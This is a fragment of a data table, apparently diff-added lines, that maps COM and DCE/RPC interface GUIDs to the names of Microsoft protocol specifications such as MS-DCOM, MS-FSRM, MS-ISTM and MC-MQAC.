+'B80F3C42-60E0-4AE0-9007-F52852D3DBED':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'0344CDDA-151E-4CBF-82DA-66AE61E97754':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'8BED2C68-A5FB-4B28-8581-A0DC5267419F':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'7883CA1C-1112-4447-84C3-52FBEB38069D':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'09829352-87C2-418D-8D79-4133969A489D':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'5B5A68E6-8B9F-45E1-8199-A95FFCCDFFFF':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'9BE77978-73ED-4A9A-87FD-13F09FEC1B13':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'ED35F7A1-5024-4E7B-A44D-07DDAF4B524D':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'4DFA1DF3-8900-4BC7-BBB5-D1A458C52410':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'370AF178-7758-4DAD-8146-7391F6E18585':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'C8550BFF-5281-4B1E-AC34-99B6FA38464D':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'08A90F5F-0702-48D6-B45F-02A9885A9768':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'8F6D760F-F0CB-4D69-B5F6-848B33E9BDC6':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'E7927575-5CC3-403B-822E-328A6B904BEE':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'DE095DB1-5368-4D11-81F6-EFEF619B7BCF':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'64FF8CCC-B287-4DAE-B08A-A72CBF45F453':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'EAFE4895-A929-41EA-B14D-613E23F62B71':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'EF13D885-642C-4709-99EC-B89561C6BC69':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'0191775E-BCFF-445A-B4F4-3BDDA54E2816':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'31A83EA0-C0E4-4A2C-8A01-353CC2A4C60A':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'D6C7CD8F-BB8D-4F96-B591-D3A5F1320269':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'ADA4E6FB-E025-401E-A5D0-C3134A281F07':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'B7D381EE-8860-47A1-8AF4-1F33B2B1F325':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'C5C04795-321C-4014-8FD6-D44658799393':'[MC-IISA]: Internet Information Services (IIS) Application Host COM', +'EBA96B22-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'12A30900-7300-11D2-B0E6-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'EBA96B24-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'2CE0C5B0-6E67-11D2-B0E6-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'EBA96B0E-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'B196B285-BAB4-101A-B69C-00AA00341D07':'[MC-MQAC]: Message Queuing (MSMQ):', +'39CE96FE-F4C5-4484-A143-4C2D5D324229':'[MC-MQAC]: Message Queuing (MSMQ):', +'D7D6E07F-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):', +'EBA96B1A-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'EBA96B18-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'EBA96B23-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'EBA96B14-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'FD174A80-89CF-11D2-B0F2-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'F72B9031-2F0C-43E8-924E-E6052CDC493F':'[MC-MQAC]: Message Queuing (MSMQ):', +'D7D6E072-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):', +'D7D6E075-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):', +'0188401C-247A-4FED-99C6-BF14119D7055':'[MC-MQAC]: Message Queuing (MSMQ):', +'EBA96B15-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'D7D6E07C-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):', +'BE5F0241-E489-4957-8CC4-A452FCF3E23E':'[MC-MQAC]: Message Queuing (MSMQ):', +'EBA96B1C-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'D7D6E077-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):', +'D7D6E078-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):', +'B196B284-BAB4-101A-B69C-00AA00341D07':'[MC-MQAC]: Message Queuing (MSMQ):', +'D7D6E073-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):', +'D7D6E07D-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):', +'EBA96B1B-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'D7D6E079-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):', +'D7D6E084-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):', +'EBA96B1F-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'33B6D07E-F27D-42FA-B2D7-BF82E11E9374':'[MC-MQAC]: Message Queuing (MSMQ):', +'D7D6E07A-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):', +'0188AC2F-ECB3-4173-9779-635CA2039C72':'[MC-MQAC]: Message Queuing (MSMQ):', +'D7D6E085-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):', +'EF0574E0-06D8-11D3-B100-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'D7D6E086-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):', +'B196B286-BAB4-101A-B69C-00AA00341D07':'[MC-MQAC]: Message Queuing (MSMQ):', +'D9933BE0-A567-11D2-B0F3-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'D7AB3341-C9D3-11D1-BB47-0080C7C5A2C0':'[MC-MQAC]: Message Queuing (MSMQ):', +'D7D6E082-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):', +'0FB15084-AF41-11CE-BD2B-204C4F4F5020':'[MC-MQAC]: Message Queuing (MSMQ):', +'D7D6E083-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):', +'EBA96B13-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'EBA96B1D-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'EBA96B17-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'EBA96B20-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'D7D6E074-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):', +'7FBE7759-5760-444D-B8A5-5E7AB9A84CCE':'[MC-MQAC]: Message Queuing (MSMQ):', +'B196B287-BAB4-101A-B69C-00AA00341D07':'[MC-MQAC]: Message Queuing (MSMQ):', +'EBA96B12-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'EBA96B1E-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'D7D6E07E-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):', +'D7D6E081-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):', +'D7D6E07B-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):', +'64C478FB-F9B0-4695-8A7F-439AC94326D3':'[MC-MQAC]: Message Queuing (MSMQ):', +'EBA96B16-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'EBA96B19-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'EBA96B10-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'EBA96B21-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'D7D6E076-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):', +'EBA96B0F-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'EBA96B11-2168-11D3-898C-00E02C074F6B':'[MC-MQAC]: Message Queuing (MSMQ):', +'D7D6E080-DCCD-11D0-AA4B-0060970DEBAE':'[MC-MQAC]: Message Queuing (MSMQ):', +'4639DB2A-BFC5-11D2-9318-00C04FBBBFB3':'[MS-ADTG]: Remote Data Services (RDS) Transport Protocol', +'0EAC4842-8763-11CF-A743-00AA00A3F00D':'[MS-ADTG]: Remote Data Services (RDS) Transport Protocol', +'070669EB-B52F-11D1-9270-00C04FBBBFB3':'[MS-ADTG]: Remote Data Services (RDS) Transport Protocol', +'3DDE7C30-165D-11D1-AB8F-00805F14DB40':'[MS-BKRP]: BackupKey Remote Protocol', +'E3D0D746-D2AF-40FD-8A7A-0D7078BB7092':'[MS-BPAU]: Background Intelligent Transfer Service (BITS) Peer-', +'6BFFD098-A112-3610-9833-012892020162':'[MS-BRWSA]: Common Internet File System (CIFS) Browser Auxiliary', +'AFC07E2E-311C-4435-808C-C483FFEEC7C9':'[MS-CAPR]: Central Access Policy Identifier (ID) Retrieval Protocol', +'B97DB8B2-4C63-11CF-BFF6-08002BE23F2F':'[MS-CMRP]: Failover Cluster:', +'97199110-DB2E-11D1-A251-0000F805CA53':'[MS-COM]: Component Object Model Plus (COM+) Protocol', +'0E3D6630-B46B-11D1-9D2D-006008B0E5CA':'[MS-COMA]: Component Object Model Plus (COM+) Remote', +'3F3B1B86-DBBE-11D1-9DA6-00805F85CFE3':'[MS-COMA]: Component Object Model Plus (COM+) Remote', +'7F43B400-1A0E-4D57-BBC9-6B0C65F7A889':'[MS-COMA]: Component Object Model Plus (COM+) Remote', +'456129E2-1078-11D2-B0F9-00805FC73204':'[MS-COMA]: Component Object Model Plus (COM+) Remote', +'8DB2180E-BD29-11D1-8B7E-00C04FD7A924':'[MS-COMA]: Component Object Model Plus (COM+) Remote', +'182C40FA-32E4-11D0-818B-00A0C9231C29':'[MS-COMA]: Component Object Model Plus (COM+) Remote', +'971668DC-C3FE-4EA1-9643-0C7230F494A1':'[MS-COMA]: Component Object Model Plus (COM+) Remote', +'98315903-7BE5-11D2-ADC1-00A02463D6E7':'[MS-COMA]: Component Object Model Plus (COM+) Remote', +'6C935649-30A6-4211-8687-C4C83E5FE1C7':'[MS-COMA]: Component Object Model Plus (COM+) Remote', +'F131EA3E-B7BE-480E-A60D-51CB2785779E':'[MS-COMA]: Component Object Model Plus (COM+) Remote', +'1F7B1697-ECB2-4CBB-8A0E-75C427F4A6F0':'[MS-COMA]: Component Object Model Plus (COM+) Remote', +'A8927A41-D3CE-11D1-8472-006008B0E5CA':'[MS-COMA]: Component Object Model Plus (COM+) Remote', +'CFADAC84-E12C-11D1-B34C-00C04F990D54':'[MS-COMA]: Component Object Model Plus (COM+) Remote', +'1D118904-94B3-4A64-9FA6-ED432666A7B9':'[MS-COMA]: Component Object Model Plus (COM+) Remote', +'47CDE9A1-0BF6-11D2-8016-00C04FB9988E':'[MS-COMA]: Component Object Model Plus (COM+) Remote', +'0E3D6631-B46B-11D1-9D2D-006008B0E5CA':'[MS-COMA]: Component Object Model Plus (COM+) Remote', +'C2BE6970-DF9E-11D1-8B87-00C04FD7A924':'[MS-COMA]: Component Object Model Plus (COM+) Remote', +'C726744E-5735-4F08-8286-C510EE638FB6':'[MS-COMA]: Component Object Model Plus (COM+) Remote', +'FBC1D17D-C498-43A0-81AF-423DDD530AF6':'[MS-COMEV]: Component Object Model Plus (COM+) Event System', +'F89AC270-D4EB-11D1-B682-00805FC79216':'[MS-COMEV]: Component Object Model Plus (COM+) Event System', +'FB2B72A1-7A68-11D1-88F9-0080C7D771BF':'[MS-COMEV]: Component Object Model Plus (COM+) Event System', +'4E14FB9F-2E22-11D1-9964-00C04FBBB345':'[MS-COMEV]: Component Object Model Plus (COM+) Event System', +'A0E8F27A-888C-11D1-B763-00C04FB926AF':'[MS-COMEV]: Component Object Model Plus (COM+) Event System', +'7FB7EA43-2D76-4EA8-8CD9-3DECC270295E':'[MS-COMEV]: Component Object Model Plus (COM+) Event System', +'99CC098F-A48A-4E9C-8E58-965C0AFC19D5':'[MS-COMEV]: Component Object Model Plus (COM+) Event System', +'FB2B72A0-7A68-11D1-88F9-0080C7D771BF':'[MS-COMEV]: Component Object Model Plus (COM+) Event System', +'4A6B0E16-2E38-11D1-9965-00C04FBBB345':'[MS-COMEV]: Component Object Model Plus (COM+) Event System', +'F4A07D63-2E25-11D1-9964-00C04FBBB345':'[MS-COMEV]: Component Object Model Plus (COM+) Event System', +'4A6B0E15-2E38-11D1-9965-00C04FBBB345':'[MS-COMEV]: Component Object Model Plus (COM+) Event System', +'B60040E0-BCF3-11D1-861D-0080C729264D':'[MS-COMT]: Component Object Model Plus (COM+) Tracker Service', +'23C9DD26-2355-4FE2-84DE-F779A238ADBD':'[MS-COMT]: Component Object Model Plus (COM+) Tracker Service', +'4E6CDCC9-FB25-4FD5-9CC5-C9F4B6559CEC':'[MS-COMT]: Component Object Model Plus (COM+) Tracker Service', +'D99E6E71-FC88-11D0-B498-00A0C90312F3':'[MS-CSRA]: Certificate Services Remote Administration Protocol', +'7FE0D935-DDA6-443F-85D0-1CFB58FE41DD':'[MS-CSRA]: Certificate Services Remote Administration Protocol', +'E1568352-586D-43E4-933F-8E6DC4DE317A':'[MS-CSVP]: Failover Cluster:', +'11942D87-A1DE-4E7F-83FB-A840D9C5928D':'[MS-CSVP]: Failover Cluster:', +'491260B5-05C9-40D9-B7F2-1F7BDAE0927F':'[MS-CSVP]: Failover Cluster:', +'C72B09DB-4D53-4F41-8DCC-2D752AB56F7C':'[MS-CSVP]: Failover Cluster:', +'E3C9B851-C442-432B-8FC6-A7FAAFC09D3B':'[MS-CSVP]: Failover Cluster:', +'4142DD5D-3472-4370-8641-DE7856431FB0':'[MS-CSVP]: Failover Cluster:', +'D6105110-8917-41A5-AA32-8E0AA2933DC9':'[MS-CSVP]: Failover Cluster:', +'A6D3E32B-9814-4409-8DE3-CFA673E6D3DE':'[MS-CSVP]: Failover Cluster:', +'04D55210-B6AC-4248-9E69-2A569D1D2AB6':'[MS-CSVP]: Failover Cluster:', +'2931C32C-F731-4C56-9FEB-3D5F1C5E72BF':'[MS-CSVP]: Failover Cluster:', +'12108A88-6858-4467-B92F-E6CF4568DFB6':'[MS-CSVP]: Failover Cluster:', +'85923CA7-1B6B-4E83-A2E4-F5BA3BFBB8A3':'[MS-CSVP]: Failover Cluster:', +'F1D6C29C-8FBE-4691-8724-F6D8DEAEAFC8':'[MS-CSVP]: Failover Cluster:', +'3CFEE98C-FB4B-44C6-BD98-A1DB14ABCA3F':'[MS-CSVP]: Failover Cluster:', +'88E7AC6D-C561-4F03-9A60-39DD768F867D':'[MS-CSVP]: Failover Cluster:', +'00000131-0000-0000-C000-000000000046':'[MS-DCOM]: Distributed Component Object Model (DCOM) Remote', +'4D9F4AB8-7D1C-11CF-861E-0020AF6E7C57':'[MS-DCOM]: Distributed Component Object Model (DCOM) Remote', +'00000143-0000-0000-C000-000000000046':'[MS-DCOM]: Distributed Component Object Model (DCOM) Remote', +'000001A0-0000-0000-C000-000000000046':'[MS-DCOM]: Distributed Component Object Model (DCOM) Remote', +'99FCFEC4-5260-101B-BBCB-00AA0021347A':'[MS-DCOM]: Distributed Component Object Model (DCOM) Remote', +'00000000-0000-0000-C000-000000000046':'[MS-DCOM]: Distributed Component Object Model (DCOM) Remote', +'4FC742E0-4A10-11CF-8273-00AA004AE673':'[MS-DFSNM]: Distributed File System (DFS):', +'9009D654-250B-4E0D-9AB0-ACB63134F69F':'[MS-DFSRH]: DFS Replication Helper Protocol', +'E65E8028-83E8-491B-9AF7-AAF6BD51A0CE':'[MS-DFSRH]: DFS Replication Helper Protocol', +'D3766938-9FB7-4392-AF2F-2CE8749DBBD0':'[MS-DFSRH]: DFS Replication Helper Protocol', +'4BB8AB1D-9EF9-4100-8EB6-DD4B4E418B72':'[MS-DFSRH]: DFS Replication Helper Protocol', +'CEB5D7B4-3964-4F71-AC17-4BF57A379D87':'[MS-DFSRH]: DFS Replication Helper Protocol', +'7A2323C7-9EBE-494A-A33C-3CC329A18E1D':'[MS-DFSRH]: DFS Replication Helper Protocol', +'20D15747-6C48-4254-A358-65039FD8C63C':'[MS-DFSRH]: DFS Replication Helper Protocol', +'C4B0C7D9-ABE0-4733-A1E1-9FDEDF260C7A':'[MS-DFSRH]: DFS Replication Helper Protocol', +'6BFFD098-A112-3610-9833-46C3F874532D':'[MS-DHCPM]: Microsoft Dynamic Host Configuration Protocol (DHCP)', +'5B821720-F63B-11D0-AAD2-00C04FC324DB':'[MS-DHCPM]: Microsoft Dynamic Host Configuration Protocol (DHCP)', +'4DA1C422-943D-11D1-ACAE-00C04FC2AA3F':'[MS-DLTM]: Distributed Link Tracking:', +'300F3532-38CC-11D0-A3F0-0020AF6B0ADD':'[MS-DLTW]: Distributed Link Tracking:', +'D2D79DF5-3400-11D0-B40B-00AA005FF586':'[MS-DMRP]: Disk Management Remote Protocol', +'DEB01010-3A37-4D26-99DF-E2BB6AE3AC61':'[MS-DMRP]: Disk Management Remote Protocol', +'3A410F21-553F-11D1-8E5E-00A0C92C9D5D':'[MS-DMRP]: Disk Management Remote Protocol', +'D2D79DF7-3400-11D0-B40B-00AA005FF586':'[MS-DMRP]: Disk Management Remote Protocol', +'4BDAFC52-FE6A-11D2-93F8-00105A11164A':'[MS-DMRP]: Disk Management Remote Protocol', +'135698D2-3A37-4D26-99DF-E2BB6AE3AC61':'[MS-DMRP]: Disk Management Remote Protocol', +'50ABC2A4-574D-40B3-9D66-EE4FD5FBA076':'[MS-DNSP]: Domain Name Service (DNS) Server Management', +'7C44D7D4-31D5-424C-BD5E-2B3E1F323D22':'[MS-DRSR]: Directory Replication Service (DRS) Remote Protocol', +'3919286A-B10C-11D0-9BA8-00C04FD92EF5':'[MS-DSSP]: Directory Services Setup Remote Protocol', +'14A8831C-BC82-11D2-8A64-0008C7457E5D':'[MS-EERR]: ExtendedError Remote Data Structure', +'C681D488-D850-11D0-8C52-00C04FD90F7E':'[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol', +'82273FDC-E32A-18C3-3F78-827929DC23EA':'[MS-EVEN]: EventLog Remoting Protocol', +'6B5BDD1E-528C-422C-AF8C-A4079BE4FE48':'[MS-FASP]: Firewall and Advanced Security Protocol', +'6099FC12-3EFF-11D0-ABD0-00C04FD91A4E':'[MS-FAX]: Fax Server and Client Remote Protocol', +'EA0A3165-4834-11D2-A6F8-00C04FA346CC':'[MS-FAX]: Fax Server and Client Remote Protocol', +'897E2E5F-93F3-4376-9C9C-FD2277495C27':'[MS-FRS2]: Distributed File System Replication Protocol', +'377F739D-9647-4B8E-97D2-5FFCE6D759CD':'[MS-FSRM]: File Server Resource Manager Protocol', +'F411D4FD-14BE-4260-8C40-03B7C95E608A':'[MS-FSRM]: File Server Resource Manager Protocol', +'4C8F96C3-5D94-4F37-A4F4-F56AB463546F':'[MS-FSRM]: File Server Resource Manager Protocol', +'CFE36CBA-1949-4E74-A14F-F1D580CEAF13':'[MS-FSRM]: File Server Resource Manager Protocol', +'8276702F-2532-4839-89BF-4872609A2EA4':'[MS-FSRM]: File Server Resource Manager Protocol', +'4A73FEE4-4102-4FCC-9FFB-38614F9EE768':'[MS-FSRM]: File Server Resource Manager Protocol', +'F3637E80-5B22-4A2B-A637-BBB642B41CFC':'[MS-FSRM]: File Server Resource Manager Protocol', +'1568A795-3924-4118-B74B-68D8F0FA5DAF':'[MS-FSRM]: File Server Resource Manager Protocol', +'6F4DBFFF-6920-4821-A6C3-B7E94C1FD60C':'[MS-FSRM]: File Server Resource Manager Protocol', +'39322A2D-38EE-4D0D-8095-421A80849A82':'[MS-FSRM]: File Server Resource Manager Protocol', +'326AF66F-2AC0-4F68-BF8C-4759F054FA29':'[MS-FSRM]: File Server Resource Manager Protocol', +'27B899FE-6FFA-4481-A184-D3DAADE8A02B':'[MS-FSRM]: File Server Resource Manager Protocol', +'E1010359-3E5D-4ECD-9FE4-EF48622FDF30':'[MS-FSRM]: File Server Resource Manager Protocol', +'8DD04909-0E34-4D55-AFAA-89E1F1A1BBB9':'[MS-FSRM]: File Server Resource Manager Protocol', +'96DEB3B5-8B91-4A2A-9D93-80A35D8AA847':'[MS-FSRM]: File Server Resource Manager Protocol', +'D8CC81D9-46B8-4FA4-BFA5-4AA9DEC9B638':'[MS-FSRM]: File Server Resource Manager Protocol', +'EDE0150F-E9A3-419C-877C-01FE5D24C5D3':'[MS-FSRM]: File Server Resource Manager Protocol', +'15A81350-497D-4ABA-80E9-D4DBCC5521FE':'[MS-FSRM]: File Server Resource Manager Protocol', +'12937789-E247-4917-9C20-F3EE9C7EE783':'[MS-FSRM]: File Server Resource Manager Protocol', +'F76FBF3B-8DDD-4B42-B05A-CB1C3FF1FEE8':'[MS-FSRM]: File Server Resource Manager Protocol', +'CB0DF960-16F5-4495-9079-3F9360D831DF':'[MS-FSRM]: File Server Resource Manager Protocol', +'4846CB01-D430-494F-ABB4-B1054999FB09':'[MS-FSRM]: File Server Resource Manager Protocol', +'6CD6408A-AE60-463B-9EF1-E117534D69DC':'[MS-FSRM]: File Server Resource Manager Protocol', +'EE321ECB-D95E-48E9-907C-C7685A013235':'[MS-FSRM]: File Server Resource Manager Protocol', +'38E87280-715C-4C7D-A280-EA1651A19FEF':'[MS-FSRM]: File Server Resource Manager Protocol', +'BEE7CE02-DF77-4515-9389-78F01C5AFC1A':'[MS-FSRM]: File Server Resource Manager Protocol', +'9A2BF113-A329-44CC-809A-5C00FCE8DA40':'[MS-FSRM]: File Server Resource Manager Protocol', +'4173AC41-172D-4D52-963C-FDC7E415F717':'[MS-FSRM]: File Server Resource Manager Protocol', +'AD55F10B-5F11-4BE7-94EF-D9EE2E470DED':'[MS-FSRM]: File Server Resource Manager Protocol', +'BB36EA26-6318-4B8C-8592-F72DD602E7A5':'[MS-FSRM]: File Server Resource Manager Protocol', +'FF4FA04E-5A94-4BDA-A3A0-D5B4D3C52EBA':'[MS-FSRM]: File Server Resource Manager Protocol', +'22BCEF93-4A3F-4183-89F9-2F8B8A628AEE':'[MS-FSRM]: File Server Resource Manager Protocol', +'6879CAF9-6617-4484-8719-71C3D8645F94':'[MS-FSRM]: File Server Resource Manager Protocol', +'5F6325D3-CE88-4733-84C1-2D6AEFC5EA07':'[MS-FSRM]: File Server Resource Manager Protocol', +'8BB68C7D-19D8-4FFB-809E-BE4FC1734014':'[MS-FSRM]: File Server Resource Manager Protocol', +'A2EFAB31-295E-46BB-B976-E86D58B52E8B':'[MS-FSRM]: File Server Resource Manager Protocol', +'0770687E-9F36-4D6F-8778-599D188461C9':'[MS-FSRM]: File Server Resource Manager Protocol', +'AFC052C2-5315-45AB-841B-C6DB0E120148':'[MS-FSRM]: File Server Resource Manager Protocol', +'515C1277-2C81-440E-8FCF-367921ED4F59':'[MS-FSRM]: File Server Resource Manager Protocol', +'D2DC89DA-EE91-48A0-85D8-CC72A56F7D04':'[MS-FSRM]: File Server Resource Manager Protocol', +'47782152-D16C-4229-B4E1-0DDFE308B9F6':'[MS-FSRM]: File Server Resource Manager Protocol', +'205BEBF8-DD93-452A-95A6-32B566B35828':'[MS-FSRM]: File Server Resource Manager Protocol', +'1BB617B8-3886-49DC-AF82-A6C90FA35DDA':'[MS-FSRM]: File Server Resource Manager Protocol', +'42DC3511-61D5-48AE-B6DC-59FC00C0A8D6':'[MS-FSRM]: File Server Resource Manager Protocol', +'426677D5-018C-485C-8A51-20B86D00BDC4':'[MS-FSRM]: File Server Resource Manager Protocol', +'E946D148-BD67-4178-8E22-1C44925ED710':'[MS-FSRM]: File Server Resource Manager Protocol', +'D646567D-26AE-4CAA-9F84-4E0AAD207FCA':'[MS-FSRM]: File Server Resource Manager Protocol', +'F82E5729-6ABA-4740-BFC7-C7F58F75FB7B':'[MS-FSRM]: File Server Resource Manager Protocol', +'2DBE63C4-B340-48A0-A5B0-158E07FC567E':'[MS-FSRM]: File Server Resource Manager Protocol', +'A8E0653C-2744-4389-A61D-7373DF8B2292':'[MS-FSRVP]: File Server Remote VSS Protocol', +'B9785960-524F-11DF-8B6D-83DCDED72085':'[MS-GKDI]: Group Key Distribution Protocol', +'91AE6020-9E3C-11CF-8D7C-00AA00C091BE':'[MS-ICPR]: ICertPassage Remote Protocol', +'E8FB8620-588F-11D2-9D61-00C04F79C5FE':'[MS-IISS]: Internet Information Services (IIS) ServiceControl', +'F612954D-3B0B-4C56-9563-227B7BE624B4':'[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW', +'8298D101-F992-43B7-8ECA-5052D885B995':'[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW', +'29822AB8-F302-11D0-9953-00C04FD919C1':'[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW', +'70B51430-B6CA-11D0-B9B9-00A0C922E750':'[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW', +'29822AB7-F302-11D0-9953-00C04FD919C1':'[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW', +'BD0C73BC-805B-4043-9C30-9A28D64DD7D2':'[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW', +'7C4E1804-E342-483D-A43E-A850CFCC8D18':'[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW', +'6619A740-8154-43BE-A186-0319578E02DB':'[MS-IOI]: IManagedObject Interface Protocol', +'8165B19E-8D3A-4D0B-80C8-97DE310DB583':'[MS-IOI]: IManagedObject Interface Protocol', +'C3FCC19E-A970-11D2-8B5A-00A0C9B7C9C4':'[MS-IOI]: IManagedObject Interface Protocol', +'82AD4280-036B-11CF-972C-00AA006887B0':'[MS-IRP]: Internet Information Services (IIS) Inetinfo Remote', +'4E65A71E-4EDE-4886-BE67-3C90A08D1F29':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'866A78BC-A2FB-4AC4-94D5-DB3041B4ED75':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'B0D1AC4B-F87A-49B2-938F-D439248575B2':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'E141FD54-B79E-4938-A6BB-D523C3D49FF1':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'40CC8569-6D23-4005-9958-E37F08AE192B':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'1822A95E-1C2B-4D02-AB25-CC116DD9DBDE':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'B4FA8E86-2517-4A88-BD67-75447219EEE4':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'3C73848A-A679-40C5-B101-C963E67F9949':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'66C9B082-7794-4948-839A-D8A5A616378F':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'01454B97-C6A5-4685-BEA8-9779C88AB990':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'D6BD6D63-E8CB-4905-AB34-8A278C93197A':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'348A0821-69BB-4889-A101-6A9BDE6FA720':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'703E6B03-7AD1-4DED-BA0D-E90496EBC5DE':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'100DA538-3F4A-45AB-B852-709148152789':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'592381E5-8D3C-42E9-B7DE-4E77A1F75AE4':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'883343F1-CEED-4E3A-8C1B-F0DADFCE281E':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'6AEA6B26-0680-411D-8877-A148DF3087D5':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'D71B2CAE-33E8-4567-AE96-3CCF31620BE2':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'8C58F6B3-4736-432A-891D-389DE3505C7C':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'1995785D-2A1E-492F-8923-E621EACA39D9':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'C10A76D8-1FE4-4C2F-B70D-665265215259':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'8D7AE740-B9C5-49FC-A11E-89171907CB86':'[MS-ISTM]: iSCSI Software Target Management Protocol', +'8AD608A4-6C16-4405-8879-B27910A68995':'[MS-ISTM]: iSCSI Software Target Management Protocol', 